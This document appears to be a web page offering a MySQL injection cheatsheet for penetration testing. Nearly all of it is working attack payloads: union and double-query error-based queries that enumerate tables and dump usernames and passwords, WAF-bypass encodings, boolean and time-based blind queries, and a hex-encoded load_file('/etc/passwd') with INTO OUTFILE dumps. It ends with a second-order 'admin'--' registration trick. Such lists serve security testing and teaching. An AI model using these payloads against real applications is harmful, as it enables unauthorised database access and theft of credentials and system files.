Web Application & SQL Injection Pen Test cheatsheet by D7X Basic Double Bypassing WAF BlindSQLI BlindSQLI (time-based) Dumping data Second order Main cheatsheet

MySQL Injection


Strings to test for MySQL Injection (breaking the query) ' " ') ") \ You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"\" LIMIT 0,1' at line 1 Basic (error-based) Injection queries (breaking and fixing the query, enumerating tables) ?id=1' and '1 ?id=1' %26%26 '1 ?id=1'%a0%26%26'1 ?id=1' or '1 ?id=1') or '1 ?id=1') --+ ?id=1") # ?id=1' or 1='1 ?id=1' order by 1# ?id=1' order by 1--+ ?id=1 order by 1--+ ?id=1 order by 1# ?id=1' --+ ?id=1' # ") # ?id=1' union all select 1,2,3 --+ ?id=1' union all select 1,2,3 # ?id=1' union all select 1,(select table_name from information_schema.tables where table_schema=database()),database() # ?id=1' union all select 1,(select column_name from information_schema.columns where table_name='users'),database() # ?id=1' union all select 1,group_concat(username),group_concat(password) from TABLE --+ #, --+, /* (commenting rest of the query) a "union all select" could be injected into the above queries in order to redesign the query and get the result from the second part of the query the id has to be altered with a "false" id value (for example -1 or 0) the above injection applies where ' is used as a quote symbol, to use it on a " based query substitute the single with double quote (1" or "1) use group_concat() and concat() to group multiple results into one (i.e. group_concat(username, concat(0x3a, password)) ) Double query (duplicate key) Injection 1' AND (select 1 from (select ...)) # 1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+ Duplicate entry '::users::1' for key 'group_key' 1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+ Duplicate entry '::users::0' for key 'group_key' 1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) # Duplicate entry '::emails::0' for key 'group_key' Subquery returns more than 1 row 1" and (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)a) --+ Duplicate entry '::10.1.29-MariaDB-6::0' for key 'group_key' 1" and (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+ Duplicate entry '::emails::0' for key 'group_key' 1" AND (select 1 from ((select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a))b) --+ Duplicate entry '::emails::1' for key 'group_key' 1" AND (select 1 from ((select count(*), concat(0x3a,0x3a,(select database() limit 0,1), 0x3a,floor(rand()*2))a from information_schema.tables group by a))b) --+ Duplicate entry '::somerandomdb::1' for key 'group_key' Subquery returns more than 1 row " AND (select 1 from (select count(*), (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) # Duplicate entry '::somerandomdb::1' for key 'group_key' in order to reach a duplicate entry page may need to be refreshed a few times used when there are no fields on the output but MySQL reports an error Bypassing WAF ?id=0%27%a0uNion%a0all%a0sElect%a01,(select%20load_file(0x2f6574632f706173737764)),3%26%26%20%271 decoded: substitute strings: %a0 (space) union all select -> union(all(select(...))) blacklisted quotes and/or slashes: load_file('/etc/passwd') -> load_file(0x2f6574632f706173737764) Substitute strings (blacklisted strings): oorr anandd o/* */r uNiOn Or (CaMel CaSe) BlindSQLI queries 1' AND (select statement with bool result) # 1' AND (select ascii(substr(database(),2,1)) = 97) # 1' AND (select (substr(version(),1,2)) = '10') # outputs result when both first and second statement is true BlindSQLI (time-based) queries 1' AND SLEEP(5) # 1' AND select if ( (select version()) like '5%', sleep(15), null) # 1' AND (select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1) = 'e', sleep(10), null)) # outputs result when both first and second statement is true Dumping data using OUTFILE and LOADFILE 1' AND select * from users into outfile "/tmp/sensitive.txt" # 1' AND select load_file('/etc/passwd') into dumpfile "/etc/passwd.txt" # 1' AND select load_file(0x2f6574632f706173737764) # 1' AND select load_file(0x2f6574632f706173737764) into outfile "/tmp/passwd.txt" # 1' AND select load_file(0x2f6574632f706173737764) into outfile "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x2e\x74\x78\x74" # into dumpfile writes only one row to the file without any escape processing or line termination (useful for BLOB). into outfile can't be used along with decimal (0x) format UPDATE (Second Order) Injection admin'-- (register as) Second Order Injection is used to register as an unfiltered user (i.e. admin'--) and then change sensitive details for admin